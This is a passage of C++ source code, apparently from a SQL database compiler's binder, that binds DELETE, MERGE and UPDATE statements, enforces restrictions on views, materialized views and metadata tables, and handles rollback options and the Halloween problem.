// MTS Delete has an outer select bindWA->isInsertSelectStatement() || // Delete inside an Insert Select statement, Soln:10-061103-0274 inUnion ) // for unions we know there is a select { if (root->getFirstNRows() < -1 || inUnion) // for unions we wish to raise a union { // The outer select has a Last 1/0 clause // specific error later, so set the flag now. setMtsStatement(TRUE); } else { // raise an error if no Last 1 clause is found. *CmpCommon::diags() << DgSqlCode(-4136); bindWA->setErrStatus(); return this; } } } } // Triggers -- if ((NOT isFastDelete()) && (NOT noIMneeded())) boundExpr = handleInlining(bindWA, boundExpr); else if (hbaseOper() && (getGroupAttr()->isEmbeddedUpdateOrDelete())) { setRETDesc(new (bindWA->wHeap()) RETDesc(bindWA)); CorrName corrOLDTable (getScanNode(TRUE)->getTableDesc()->getCorrNameObj().getQualifiedNameObj(), bindWA->wHeap(),"OLD"); // expose OLD table columns getRETDesc()->addColumns(bindWA, *child(0)->getRETDesc(), &corrOLDTable); ValueIdList outputs; getRETDesc()->getValueIdList(outputs, USER_AND_SYSTEM_COLUMNS); addPotentialOutputValues(outputs); bindWA->getCurrentScope()->setRETDesc(getRETDesc()); } if (isMtsStatement()) bindWA->setEmbeddedIUDStatement(TRUE); if (getFirstNRows() > 0) { // create a firstN node to delete FIRST N rows, if no such node was created // during handleInlining. Occurs when DELETE FIRST N is used on table with no // dependent objects. FirstN * firstn = new(bindWA->wHeap()) FirstN(boundExpr, getFirstNRows()); if (NOT(scanNode && scanNode->getSelectionPred().containsSubquery())) firstn->setCanExecuteInDp2(TRUE); firstn->bindNode(bindWA); if (bindWA->errStatus()) return NULL; setFirstNRows(-1); boundExpr = firstn; } if (csl()) { for (Lng32 i = 0; i < csl()->entries(); i++) { NAString * nas = (NAString*)(*csl())[i]; bindWA->hbaseColUsageInfo()->insert ((QualifiedName*)&getTableDesc()->getNATable()->getTableName(), nas); } } return boundExpr; } // Delete::bindNode() // ----------------------------------------------------------------------- // member functions for class MergeDelete // ----------------------------------------------------------------------- RelExpr *MergeDelete::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } bindWA->initNewScope(); if ((isMerge()) && (child(0)) && (child(0)->castToRelExpr()->selPredTree())) { if (child(0)->castToRelExpr()->selPredTree()->containsSubquery()) { *CmpCommon::diags() << DgSqlCode(-3241) << DgString0(" Subquery in ON clause not allowed."); bindWA->setErrStatus(); return this; } if (child(0)->castToRelExpr()->selPredTree()->containsUDF()) { *CmpCommon::diags() << DgSqlCode(-4471) << DgString0(((UDFunction *)child(0)-> castToRelExpr()->selPredTree()-> containsUDF())-> getFunctionName().getExternalName()); bindWA->setErrStatus(); return this; } } // if insertValues, then this is an upsert stmt. if (insertValues()) { if (insertValues()->containsSubquery()) { *CmpCommon::diags() << DgSqlCode(-3241) << DgString0(" Subquery in INSERT clause not allowed."); bindWA->setErrStatus(); return this; } if (insertValues()->containsUDF()) { *CmpCommon::diags() << DgSqlCode(-4471) << DgString0(((UDFunction *)insertValues()-> containsUDF())-> getFunctionName().getExternalName()); bindWA->setErrStatus(); return this; } Tuple * tuple = new (bindWA->wHeap()) Tuple(insertValues()); Insert * ins = new (bindWA->wHeap()) Insert(getTableName(), NULL, REL_UNARY_INSERT, tuple, insertCols(), NULL); ins->setInsertType(Insert::SIMPLE_INSERT); ins->setIsMergeDelete(TRUE); ins->setTableDesc(getTableDesc()); bindWA->getCurrentScope()->xtnmStack()->createXTNM(); ins = (Insert*)ins->bindNode(bindWA); if (bindWA->errStatus()) return NULL; bindWA->getCurrentScope()->xtnmStack()->removeXTNM(); mergeInsertRecExpr() = ins->newRecExpr(); mergeInsertRecExprArray() = ins->newRecExprArray(); } NATable *naTable = bindWA->getNATable(getTableName()); if (bindWA->errStatus()) return NULL; if ((naTable->getViewText() != NULL) && (naTable->getViewCheck())) { *CmpCommon::diags() << DgSqlCode(-3241) << DgString0(" View with check option not allowed."); bindWA->setErrStatus(); return NULL; } bindWA->setMergeStatement(TRUE); RelExpr * boundExpr = Delete::bindNode(bindWA); if (bindWA->errStatus()) return NULL; if (checkForMergeRestrictions(bindWA)) return NULL; bindWA->removeCurrentScope(); bindWA->setMergeStatement(TRUE); return boundExpr; } // MergeDelete::bindNode() static const char NEWTable [] = "NEW"; // QSTUFF: corr for embedded d/u static const char OLDTable [] = "OLD"; // QSTUFF: corr for embedded d/u // QSTUFF // this method binds both, the set clauses applied to the after // image as well as the set clauses applied to the before image // the new set on rollback clause allows an application to modify // the before image. // delete from tab set on rollback x = 1; // update tab set x = 1 set on rollback x = 2; #pragma nowarn(770) // warning elimination void GenericUpdate::bindUpdateExpr(BindWA *bindWA, ItemExpr *recExpr, ItemExprList &assignList, RelExpr *boundView, Scan *scanNode, SET(short) &stoiColumnSet, NABoolean onRollback) { RETDesc *origScope = NULL; ValueIdSet &newRecExpr = (onRollback == TRUE) ? newRecBeforeExpr() : this->newRecExpr(); ValueIdArray &newRecExprArray = (onRollback == TRUE) ? newRecBeforeExprArray() : this->newRecExprArray(); if (onRollback && ((!getTableDesc()->getClusteringIndex()->getNAFileSet()->isAudited()) || (getTableDesc()->getNATable()->hasLobColumn()))) { // SET ON ROLLBACK clause is not allowed on a non-audited table *CmpCommon::diags() << DgSqlCode(-4214) << DgTableName(getTableDesc()->getNATable()->getTableName(). getQualifiedNameAsAnsiString()); bindWA->setErrStatus(); return; } CollIndex i, j; CollIndexList colnoList; // map of col nums (row positions) CollIndex a = assignList.entries(); const ColumnDescList *viewColumns = NULL; // if this is a view then get the columns of the view if (boundView) { viewColumns = boundView->getRETDesc()->getColumnList(); } // if the GU has a SET ON ROLLBACK clause this method is called // twice: once to bind the columns in the SET clause and a second // time to bind the columns in the SET ON ROLLBACK clause. // Initially the update column list of the stoi_ is empty. // If this is the second call, store the update column list // from the first call. short *stoiColumnList = NULL; CollIndex currColumnCount = 0; if (currColumnCount = stoi_->getStoi()->getColumnListCount()) { stoiColumnList = new (bindWA->wHeap()) short[currColumnCount]; for (i = 0; i < currColumnCount; i++) stoiColumnList[i] = stoi_->getStoi()->getUpdateColumn(i); } stoi_->getStoi()->setColumnList(new (bindWA->wHeap()) short[a + currColumnCount]); for (i = 0; i < a; i++) { CMPASSERT(assignList[i]->getOperatorType() == ITM_ASSIGN); assignList[i]->child(0)->bindNode(bindWA); // LHS if (bindWA->errStatus()) return; const NAColumn *nacol = assignList[i]->child(0).getNAColumn(); if(getOperatorType() == REL_UNARY_UPDATE) { stoi_->getStoi()->setUpdateColumn(i, (short) nacol->getPosition()); stoi_->getStoi()->incColumnListCount(); stoi_->addUpdateColumn(nacol->getPosition()); } const NAType *colType = nacol->getType(); if (!colType->isSupportedType()) { *CmpCommon::diags() << DgSqlCode(-4028) // 4028 table not updatatble << DgTableName(nacol->getNATable()->getTableName().getQualifiedNameAsAnsiString()); bindWA->setErrStatus(); return; } // If this is a sequence generator IDENTITY column // with a default type of GENERATED ALWAYS, // then post error -3428. GENERATED ALWAYS // IDENTITY columns may not be updated. if(getOperatorType() == REL_UNARY_UPDATE && CmpCommon::getDefault(COMP_BOOL_210) == DF_ON && nacol->isIdentityColumnAlways()) { *CmpCommon::diags() << DgSqlCode(-3428) << DgString0(nacol->getColName()); bindWA->setErrStatus(); return; } colnoList.insert(nacol->getPosition()); // save colno for next loop // in case its not a view we record the column position of the // base table, otherwise that of the view if (NOT boundView) stoiColumnSet.insert((short) nacol->getPosition()); // if this is a view get the positions of the columns // within the view that are being updated. if (boundView) { ValueId vid = assignList[i]->child(0).getValueId(); NABoolean found = FALSE; for (CollIndex k=0; k < viewColumns->entries(); k++) { if ((*viewColumns)[k]->getValueId() == vid) { stoiColumnSet.insert((short) k); found = TRUE; // Updatable views cannot have any underlying basetable column // appear more than once, so it's safe to break out of the loop. break; } } // loop k CMPASSERT(found); } // boundView } // loop i<a // If this is the second call to this method, restore the update // columns bound in the first call if (currColumnCount) { for (i = a; i < (currColumnCount + a); i++) { stoi_->getStoi()->setUpdateColumn(i, stoiColumnList[i-a]); stoi_->addUpdateColumn(stoiColumnList[i-a]); } } // RHS: Bind the right side of the Assigns such that the source expressions // reference the columns of the source table. // //### With a cascade of views, should this be "getRETDesc" as is, //### or "scanNode->getRETDesc" ? --? //### Should I set this->setRD to be the target(new)tbl at the beginning, //### explicitly say "scanNode..." here? --i think not // if (GU_DEBUG) GU_DEBUG_Display(bindWA, this, "u"); origScope = bindWA->getCurrentScope()->getRETDesc(); // this sets the scope to the scan table for the before values // the previous scope was to the "UPDATE" table // we will reset the scope before returning in order not to introduce // hidden side effects but have the generic update explicitely point // to the scan scope bindWA->getCurrentScope()->setRETDesc(getRETDesc()); //this has to be done after binding the LHS because of triggers //Soln :10-050110-3403 : Don't side-effect the SET on ROLLBACK list //when we come down to process it the next time over.So process only //the assignList ItemExpr* tempExpr = assignList.convertToItemExpr(); tempExpr->convertToValueIdSet(newRecExpr, bindWA, ITM_ITEM_LIST); if (bindWA->errStatus()) return; if (NOT onRollback) { for (ValueId v = newRecExpr.init(); newRecExpr.next(v); newRecExpr.advance(v)) { CMPASSERT(v.getItemExpr()->getOperatorType() == ITM_ASSIGN); // remove all the onrollack expressions if (((Assign *)v.getItemExpr())->onRollback()) { newRecExpr.remove(v); } } } else { for (ValueId v = newRecExpr.init(); newRecExpr.next(v); newRecExpr.advance(v)) { CMPASSERT(v.getItemExpr()->getOperatorType() == ITM_ASSIGN); // remove all the NON-onrollack expressions if ((getOperatorType() == REL_UNARY_UPDATE) && !(((Assign *)v.getItemExpr())->onRollback())) { newRecExpr.remove(v); } } if (getOperatorType() == REL_UNARY_DELETE) { recExpr->convertToValueIdSet(this->newRecExpr(), bindWA, ITM_ITEM_LIST); } } // now we built the RHS // Now we have our colnoList map with which to build a temporary array // (with holes) and get the update columns ordered (eliminating dups). // Actually we store the ids of the bound Assign nodes corresponding // to the columns, of course. // CollIndex totalColCount = getTableDesc()->getColumnList().entries(); #pragma nowarn(1506) // warning elimination ValueIdArray holeyArray(totalColCount); #pragma warn(1506) // warning elimination ValueId assignId; // i'th newRecExpr valueid for (i = 0, assignId = newRecExpr.init(); // bizarre ValueIdSet iter newRecExpr.next(assignId); i++, newRecExpr.advance(assignId)) { j = colnoList[i]; if (holeyArray.used(j)) { const NAColumn *nacol = holeyArray[j].getItemExpr()->child(0).getNAColumn(); //4022 target column multiply specified *CmpCommon::diags() << DgSqlCode(-4022) << DgColumnName(nacol->getColName()); bindWA->setErrStatus(); return; } holeyArray.insertAt(j, assignId); } // // Now we have the holey array. The next loop ignores unused entries // and copies the used entries into newRecExprArray(), with no holes. // It also builds a list of the columns being updated that contain // a column on the right side of the SET assignment expression. // // Entering this loop, i is the number of specified update columns; // exiting, j is. // CMPASSERT(i == a); // we built a map between identifical old and new columns, i.e. columns // which are not updated and thus identical. We insert the resulting // equivalence relationships e.g. old.a = new.a during transformation // into the respective VEGGIES this allows the optimizer to select index // scan for satisfying order requirements specified by an order by clause // on new columns, e.g. // select * from (update t set y = y + 1 return new.a) t order by a; // we cannot get the benefit of this VEG for a merge statement when IM is required // allowing a VEG in this case causes corruption on base table key values because // we use the "old" value of key column from fetchReturnedExpr, which can be junk // in case there is no row to update/delete, and a brand bew row is being inserted NABoolean mergeWithIndex = isMerge() && getTableDesc()->hasSecondaryIndexes() ; if ((NOT onRollback) && (NOT mergeWithIndex)){ for (i = 0;i < totalColCount; i++){ if (!(holeyArray.used(i))){ oldToNewMap().addMapEntry( scanNode->getTableDesc()-> getColumnList()[i].getItemExpr()->getValueId(), getTableDesc()-> getColumnList()[i].getItemExpr()->getValueId()); } } } // when binding a view which contains an embedded update // we must map update valueids to scan value ids // to allow for checking of access rights. for (i = 0; i < getTableDesc()->getColumnList().entries();i++) bindWA->getUpdateToScanValueIds().addMapEntry( getTableDesc()->getColumnList()[i].getItemExpr()->getValueId(), scanNode->getTableDesc()->getColumnList()[i].getItemExpr()->getValueId()); newRecExprArray.resize(i); TableDesc *scanDesc = scanNode->getTableDesc(); NABoolean rightContainsColumn = FALSE; for (i = j = 0; i < totalColCount; i++) { if (holeyArray.used(i)) { ValueId assignExpr = holeyArray[i]; newRecExprArray.insertAt(j++, assignExpr); ItemExpr *right = assignExpr.getItemExpr()->child(1); // even if a column is set to a constant we mark it // as updated to prevent indices covering this column from // being used for access ItemExpr *left = assignExpr.getItemExpr()->child(0); scanDesc->addColUpdated(left->getValueId()); if (right->containsColumn()) rightContainsColumn = TRUE; } } // WITH NO ROLLBACK not supported if rightside of update // contains a column expression. Also this feature is not // supported with the SET ON ROLLBACK feature if (isNoRollback() || (CmpCommon::transMode()->getRollbackMode() == TransMode::NO_ROLLBACK_)) { if ((rightContainsColumn && CmpCommon::getDefault(ALLOW_RISKY_UPDATE_WITH_NO_ROLLBACK) == DF_OFF) || onRollback) { NAString warnMsg = ""; if(rightContainsColumn) { warnMsg = "Suggestion: Set ALLOW_RISKY_UPDATE_WITH_NO_ROLLBACK CQD to ON to allow"; if (getOperatorType() == REL_UNARY_DELETE) warnMsg += " DELETE "; else warnMsg += " UPDATE "; warnMsg += "command with right-hand side SET clause consisting of columns."; } if (getOperatorType() == REL_UNARY_DELETE) *CmpCommon::diags() << DgSqlCode(-3234) << DgString0(warnMsg); else *CmpCommon::diags() << DgSqlCode(-3233) << DgString0(warnMsg); bindWA->setErrStatus(); return ; } } CMPASSERT(j == a); bindWA->getCurrentScope()->setRETDesc(origScope); } #pragma warn(770) // warning elimination void getScanPreds(RelExpr *start, ValueIdSet &preds) { RelExpr *result = start; while (result) { preds += result->selectionPred(); if (result->getOperatorType() == REL_SCAN) break; if (result->getArity() > 1) { return ; } result = result->child(0); } return; } // Note that this is the R2 compatible way to handle Halloween problem. // This update (only insert for now) contains a reference to the // target in the source. This could potentially run into the so // called Halloween problem. Determine if this is a case we may be // able to handle. The cases that we handle are: // // -- The reference to the target is in a subquery // -- There any number of references to the target in the source // -- The subquery cannot be a row subquery. // -- The subquery must contain only one source (the reference to the target) // -- // // Return TRUE if this does represent a Halloween problem and the caller will // then issue the error message // // Return FALSE is this is a case we can handle. Set the // 'avoidHalloweenR2' flag in the subquery and this generic Update so // that the optimizer will pick a plan that is Halloween safe. // NABoolean GenericUpdate::checkForHalloweenR2(Int32 numScansToFind) { // If there are no scans, no problem, return okay (FALSE) // if(numScansToFind == 0) { return FALSE; } // Allow any number of scans // Do not support for general NEO users. if (CmpCommon::getDefault(MODE_SPECIAL_1) == DF_OFF) return TRUE; // Number of scans of the target table found so far. // Int32 numHalloweenScans = 0; // Get the primary source of the generic update. We are looking for // the halloween scans in the predicates of this scan node // ValueIdSet preds; getScanPreds(this, preds); Subquery *subq; // Search the preds of this scan for subqueries. // // ValueIdSet &preds = scanNode->selectionPred(); for(ValueId p = preds.init(); preds.next(p); preds.advance(p)) { ItemExpr *pred = p.getItemExpr(); // If this pred contains a subquery, find the scans // if(pred->containsSubquery()) { ValueIdSet subqPreds; subqPreds += pred->getValueId(); // Search all the preds and their children // while(subqPreds.entries()) { ValueIdSet children; for(ValueId s = subqPreds.init(); subqPreds.next(s); subqPreds.advance(s)) { ItemExpr *term = s.getItemExpr(); // Found a subquery, now look for the scan... // if(term->isASubquery()) { subq = (Subquery *)term; // We don't support row subqueries, keep looking for the scan // in the next subquery. if(!subq->isARowSubquery()) { // Is this the subquery that has the scan of the table // we are updating? // Scan *halloweenScan = subq->getSubquery()->getScanNode(FALSE); if(halloweenScan) { // Is this the scan we are looking for? // if(halloweenScan->getTableDesc()->getNATable() == getTableDesc()->getNATable()) { subq->setAvoidHalloweenR2(this); numHalloweenScans++; } } } } // Follow all the children as well. // for(Int32 i = 0; i < term->getArity(); i++) { children += term->child(i)->getValueId(); } } subqPreds = children; } } } setAvoidHalloweenR2(numScansToFind); // If we found and marked all the halloween scans, then return FALSE (allow). // We have marked the subqueries to avoid the halloween problem. This will // force the optimizer to pick a plan that will be safe. // if(numHalloweenScans == numScansToFind) return FALSE; return TRUE; } // See ANSI 7.9 SR 12 + 6.3 SR 8 for definition of "updatable" table // references; in particular, note that one of the requirements for a view's // being updatable is that ultimately underlying it (passing through a // whole stack of views) is *exactly one* wbase table -- i.e., no joins // allowed. // RelExpr *GenericUpdate::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } // QSTUFF // we indicate that we are in a generic update. If we are // already in a generic update we know that this time we are // binding a generic update within a view. // however be aware of the following scenario. We currently // reject embedded updates and streams in the source but // obviously allow view with embedded updates as a target. // Since its already within a generic update we will only // return the scan node to the insert // // insert into select ... from (update/delete ....) t; // // but not cause the update to be bound in when doing // // insert into viewWithDeleteOrUpdate values(...); // // in both cases we got an insert->update/delete->scan NABoolean inGenericUpdate = FALSE; if (getOperatorType() != REL_UNARY_INSERT) inGenericUpdate = bindWA->setInGenericUpdate(TRUE); NABoolean returnScanNode = (inGenericUpdate && bindWA->inViewExpansion() && ( getOperatorType() == REL_UNARY_DELETE || getOperatorType() == REL_UNARY_UPDATE )); // those group attributes should be set only by the topmost // generic update once we are invoked when already binding // another generic we reset those group attributes since we // already know that we will only return a scan node if ((returnScanNode) && (child(0))) { child(0)->getGroupAttr()->setStream(FALSE); child(0)->getGroupAttr()->setSkipInitialScan(FALSE); child(0)->getGroupAttr()->setEmbeddedIUD(NO_OPERATOR_TYPE); } // if we have no user-specified access options then // get it from nearest enclosing scope that has one (if any) if (!accessOptions().userSpecified()) { StmtLevelAccessOptions *axOpts = bindWA->findUserSpecifiedAccessOption(); if (axOpts) { accessOptions() = *axOpts; } } // The above code is in Scan::bindNode also. // It would be nice to refactor this common code; someday. // Make sure we have the appropriate transaction mode & isolation level // in order to do the update. Genesis 10-970922-3488. // Keep this logic in sync with Generator::verifyUpdatableTransMode()! Lng32 sqlcodeA = 0, sqlcodeB = 0; // fix case 10-040429-7402 by checking our statement level access options // first before declaring any error 3140/3141. TransMode::IsolationLevel il; ActiveSchemaDB()->getDefaults().getIsolationLevel (il, CmpCommon::getDefault(ISOLATION_LEVEL_FOR_UPDATES)); verifyUpdatableTrans(&accessOptions(), CmpCommon::transMode(), il, sqlcodeA, sqlcodeB); if (sqlcodeA || sqlcodeB) { // 3140 The isolation level cannot be READ UNCOMMITTED. // 3141 The transaction access mode must be READ WRITE. if (sqlcodeA) *CmpCommon::diags() << DgSqlCode(sqlcodeA); if (sqlcodeB) *CmpCommon::diags() << DgSqlCode(sqlcodeB); bindWA->setErrStatus(); return this; } Int64 transId=-1; if ((isNoRollback() && (NOT (Get_SqlParser_Flags(INTERNAL_QUERY_FROM_EXEUTIL)))) && ((CmpCommon::transMode()->getAutoCommit() != TransMode::ON_ ) || (NAExecTrans(0, transId)))) { // do not return an error if this is a showplan query being compiled // in the second arkcmp. const NAString * val = ActiveControlDB()->getControlSessionValue("SHOWPLAN"); if (NOT ((val) && (*val == "ON"))) { *CmpCommon::diags() << DgSqlCode(-3231); // Autocommit must be ON, bindWA->setErrStatus(); // if No ROLLBACK is specified in IUD statement syntax return this; } } if (isNoRollback() || (CmpCommon::transMode()->getRollbackMode() == TransMode::NO_ROLLBACK_)) { if ((child(0)->getGroupAttr()->isStream()) || (child(0)->getGroupAttr()->isEmbeddedUpdateOrDelete()) || (updateCurrentOf())) { if (getOperatorType() == REL_UNARY_DELETE) *CmpCommon::diags() << DgSqlCode(-3234); else *CmpCommon::diags() << DgSqlCode(-3233); bindWA->setErrStatus(); return this; } } // The SQL standard as defined in ISO/IEC JTC 1/SC 32 date: 2009-01-12 // CD 9075-2:200x(E) published by ISO/IEC JTC 1/SC 32/WG 3 // "Information technology -- Database languages -- SQL -- // Part2: Foundation (SQL/Foundation)", page 920, section 14.14, // page 918, section 14.13, page 900, section 14.9, page 898, section 14.8 // does allow correlation names in update & delete statements. // Therefore, we delete this unnecessary restriction as part of the fix // for genesis solution 10-090921-4747: // Many places in this method assume the specified target table // has no correlation name -- indeed, Ansi syntax does not allow one -- // this assert is to catch any future syntax-extensions we may do. // // E.g., see code marked // ##SQLMP-SYNTAX-KLUDGE## // in SqlParser.y + SqlParserAux.cpp, // which add a non-Ansi corr name to all table refs // when they really only should add to SELECTed tables. // So here, in an INSERT/UPDATE/DELETEd table, // we UNDO that kludge. // //if (!getTableName().getCorrNameAsString().isNull()) { //CMPASSERT(SqlParser_NAMETYPE == DF_NSK || // HasMPLocPrefix(getTableName().getQualifiedNameObj().getCatalogName())); //getTableName().setCorrName(""); // UNDO that kludge! //} // Genesis 10-980831-4973 if (((getTableName().isLocationNameSpecified() || getTableName().isPartitionNameSpecified()) && (!Get_SqlParser_Flags(ALLOW_SPECIALTABLETYPE))) && (getOperatorType() != REL_UNARY_DELETE)) { *CmpCommon::diags() << DgSqlCode(-4061); // 4061 a partn not ins/upd'able bindWA->setErrStatus(); return this; } // -- Triggers // If this node is part of the action of a trigger, // then don't count the rows that are affected. if (bindWA->findNextScopeWithTriggerInfo() != NULL) { rowsAffected_ = DO_NOT_COMPUTE_ROWSAFFECTED; // Does the table name match the name of one of the transition tables? if (updatedTableName_.isATriggerTransitionName(bindWA)) { // 11020 Ambiguous or illegal use of transition name $0~string0. *CmpCommon::diags() << DgSqlCode(-11020) << DgString0(getTableName().getQualifiedNameAsString()); bindWA->setErrStatus(); return this; } } // Get the NATable for this object, and an initial ref count. // Set up stoi. // // We do not suppress mixed name checking in getNATable for R1 // from here, because prototype name executes through here. We // want to check prototype name. const NATable *naTable = bindWA->getNATable(getTableName()); if (bindWA->errStatus()) return this; if (naTable && naTable->isHbaseTable()) hbaseOper() = TRUE; if ((CmpCommon::getDefault(ALLOW_DML_ON_NONAUDITED_TABLE) == DF_OFF) && naTable && naTable->getClusteringIndex() && (!naTable->getClusteringIndex()->isAudited()) // && !bindWA->isBindingMvRefresh() // uncomment if non-audit MVs are ever supported ) { *CmpCommon::diags() << DgSqlCode(-4211) << DgTableName( naTable->getTableName().getQualifiedNameAsAnsiString()); bindWA->setErrStatus(); return NULL; } // By setting the CQD OVERRIDE_SYSKEY to 'ON', the users // are allowed to specify a SYSKEY value on an INSERT. // We achieve this by treating a system column as a user column. // This support is only provided for key sequenced files // for MX and MP tables. if (getOperatorType() == REL_UNARY_INSERT && naTable->hasSystemColumnUsedAsUserColumn() && naTable->getClusteringIndex()->isEntrySequenced()) { *CmpCommon::diags() << DgSqlCode(-3410) << DgTableName(naTable->getTableName().getQualifiedNameAsString()); bindWA->setErrStatus(); return this; } Int32 beforeRefcount = naTable->getReferenceCount(); OptSqlTableOpenInfo *listedStoi = setupStoi(stoi_, bindWA, this, naTable, getTableName()); if (getOperatorType() == REL_UNARY_INSERT && NOT naTable->isInsertable()) { *CmpCommon::diags() << DgSqlCode(-4027) // 4027 table not insertable << DgTableName(naTable->getTableName().getQualifiedNameAsAnsiString()); bindWA->setErrStatus(); return this; } if (NOT naTable->isUpdatable()) { *CmpCommon::diags() << DgSqlCode(-4028) // 4028 table not updatable << DgTableName(naTable->getTableName().getQualifiedNameAsAnsiString()); bindWA->setErrStatus(); return this; } if (naTable->isVerticalPartition()) { // LCOV_EXCL_START - cnu // On attempt to update an individual VP, say: 4082 table not accessible *CmpCommon::diags() << DgSqlCode(-4082) << DgTableName(naTable->getTableName().getQualifiedNameAsAnsiString()); bindWA->setErrStatus(); return this; // LCOV_EXCL_STOP } if (naTable->isAnMV()) { // we currently don't allow updating (deleting) MVs in a trigger action if (bindWA->inDDL() && bindWA->isInTrigger ()) { *CmpCommon::diags() << DgSqlCode(-11051); bindWA->setErrStatus(); return this; } // This table is a materialized view. Are we allowed to change it? if ((getTableName().getSpecialType() != ExtendedQualName::MV_TABLE) && (getTableName().getSpecialType() != ExtendedQualName::GHOST_MV_TABLE)) { // The special syntax flag was not used - // Only on request MV allows direct DELETE operations by the user. MVInfoForDML *mvInfo = ((NATable *)naTable)->getMVInfo(bindWA); if (mvInfo->getRefreshType() == COM_ON_REQUEST && getOperatorType() == REL_UNARY_DELETE) { // Set NOLOG flag. setNoLogOperation(); } else { // Direct update is only allowed for User Maintainable MVs. if (mvInfo->getRefreshType() != COM_BY_USER) { // A Materialized View cannot be directly updated. *CmpCommon::diags() << DgSqlCode(-12074); bindWA->setErrStatus(); return this; } } } // If this is not an INTERNAL REFRESH command, make sure the MV is // initialized and available. // If this is FastDelete using parallel purgedata, do not enforce // that MV is initialized. if (!bindWA->isBindingMvRefresh()) { if (NOT ((getOperatorType() == REL_UNARY_DELETE) && (((Delete*)this)->isFastDelete()))) { if (naTable->verifyMvIsInitializedAndAvailable(bindWA)) return NULL; } } } if (naTable->isAnMVMetaData() && getTableName().getSpecialType() != ExtendedQualName::MVS_UMD) { if (getTableName().getPrototype() == NULL || getTableName().getPrototype()->getSpecialType() != ExtendedQualName::MVS_UMD) { // ERROR 12075: A Materialized View Metadata Table cannot be directly updated. *CmpCommon::diags() << DgSqlCode(-12075); bindWA->setErrStatus(); return this; } } if ((naTable->isSeabaseTable()) && (naTable->isSeabaseMDTable() || naTable->isSeabasePrivSchemaTable()) && (NOT naTable->isUserUpdatableSeabaseMDTable()) && (NOT Get_SqlParser_Flags(INTERNAL_QUERY_FROM_EXEUTIL))) { // IUD on hbase metadata is only allowed for internal queries. *CmpCommon::diags() << DgSqlCode(-1391) << DgString0(naTable->getTableName().getQualifiedNameAsAnsiString()) << DgString1("metadata"); bindWA->setErrStatus(); return this; } else if ((naTable->isSeabaseTable()) && (naTable->getTableName().getSchemaName() == SEABASE_REPOS_SCHEMA) && (NOT Get_SqlParser_Flags(INTERNAL_QUERY_FROM_EXEUTIL))) { // IUD on hbase metadata is only allowed for internal queries. *CmpCommon::diags() << DgSqlCode(-1391) << DgString0(naTable->getTableName().getQualifiedNameAsAnsiString()) << DgString1("repository"); bindWA->setErrStatus(); return this; } if ((naTable->isHbaseTable()) && (naTable->isHbaseCellTable() || naTable->isHbaseRowTable()) && (CmpCommon::getDefault(HBASE_NATIVE_IUD) == DF_OFF)) { *CmpCommon::diags() << DgSqlCode(-4223) << DgString0("Insert/Update/Delete on native hbase tables or in CELL/ROW format is"); bindWA->setErrStatus(); return this; } if (naTable->isHiveTable() && (getOperatorType() != REL_UNARY_INSERT) && (getOperatorType() != REL_LEAF_INSERT)) { *CmpCommon::diags() << DgSqlCode(-4223) << DgString0("Update/Delete on Hive table is"); bindWA->setErrStatus(); return this; } NABoolean insertFromValuesList = (getOperatorType() == REL_UNARY_INSERT && (child(0)->getOperatorType() == REL_TUPLE || // VALUES(1,'b') child(0)->getOperatorType() == REL_TUPLE_LIST || // VALUES(1,'b'),(2,'Y') child(0)->getOperatorType() == REL_UNION)) || // VALUES..(with subquery inside the list) getOperatorType() == REL_LEAF_INSERT; // index type of inserts if((!insertFromValuesList) && (getOperatorType() == REL_UNARY_INSERT)) bindWA->setInsertSelectStatement(TRUE); // an update/delete node is created as an update/delete with child // of a scan node by parser. If this is the case, then no security // checks are needed on child Scan node. if ((getOperatorType() == REL_UNARY_UPDATE || getOperatorType() == REL_UNARY_DELETE) && (child(0) && (child(0)->getOperatorType() == REL_SCAN))) { Scan * scanNode = (Scan *)(child(0)->castToRelExpr()); scanNode->setNoSecurityCheck(TRUE); } // Setting the begin index for TableViewUsageList to zero, instead // of the bindWA->tableViewUsageList().entries(); Becasue // bindWA->tableViewUsageList().entries() sets the index to the current //entry in the list, which excludes previous statements executed in a CS. CollIndex begSrcUsgIx = 0; if (!insertFromValuesList) { // // Create a new table name scope for the source table (child node). // Bind the source. // Reset scope context/naming. // bindWA->getCurrentScope()->xtnmStack()->createXTNM(); bindChildren(bindWA); if (bindWA->errStatus()) return this; bindWA->getCurrentScope()->xtnmStack()->removeXTNM(); // QSTUFF // we currently don't support streams and embedded updates // for "insert into select from" statements. if (getOperatorType() == REL_UNARY_INSERT){ if (child(0)->getGroupAttr()->isStream()){ *CmpCommon::diags() << DgSqlCode(-4170); bindWA->setErrStatus(); return this; } if (child(0)->getGroupAttr()->isEmbeddedUpdateOrDelete() || child(0)->getGroupAttr()->isEmbeddedInsert()){ *CmpCommon::diags() << DgSqlCode(-4171) << DgString0(getGroupAttr()->getOperationWithinGroup()); bindWA->setErrStatus(); return this; } } // binding a generic update within a generic update // can only occur when binding an updatable view containing // an embedded delete or embedded update. We don't continue // binding the generic update and but return the bound scan node. // the scan node may be either a base table scan or a RenameTable // node in case we are updating a view // Since an embedded generic update may have referred to the OLD // and NEW table we set a binder flag causing the table name to // be changed to the name of the underlying scan table in the // RelRoot on top of the generic update. Since we // know that the normalizer has checked before allowing an update // on the view that not both, i.e.new and old column values have been // referred this is a safe operation. if (returnScanNode){ // this line is a hack to get through Update::bindNode on the return setTableDesc(getScanNode()->getTableDesc()); bindWA->setInGenericUpdate(inGenericUpdate); bindWA->setRenameToScanTable (TRUE); NATable *nTable = bindWA->getNATable(getTableName()); // decr once for just getting it here // and again to compensate for the reference taken out // previously which becomes obsolete since we just return a scan node nTable->decrReferenceCount(); nTable->decrReferenceCount(); return getViewScanNode(); } // QSTUFF } else { // else, Insert::bindNode does VALUES(...) in its Assign::bindNode loop // in particular, it does VALUES(..,DEFAULT,..) } #ifndef NDEBUG GU_DEBUG_Display(bindWA, this, "incoming", NULL, TRUE); #endif // QSTUFF // in case of an insert operation we don't set it initially in order // to prevent that an embedded update or delete may be accidentially // removed from a source view. However we need it for binding the // target because it may be a view and its embedded updates have to // be removed. if (getOperatorType() == REL_UNARY_INSERT) inGenericUpdate = bindWA->setInGenericUpdate(TRUE); CMPASSERT(NOT(updateCurrentOf() && getGroupAttr()->isEmbeddedUpdateOrDelete())); // this is a patch to allow for embedded updates in view definitions ParNameLocList * pLoc = NULL; if (getGroupAttr()->isEmbeddedUpdate()) { pLoc = bindWA->getNameLocListPtr(); 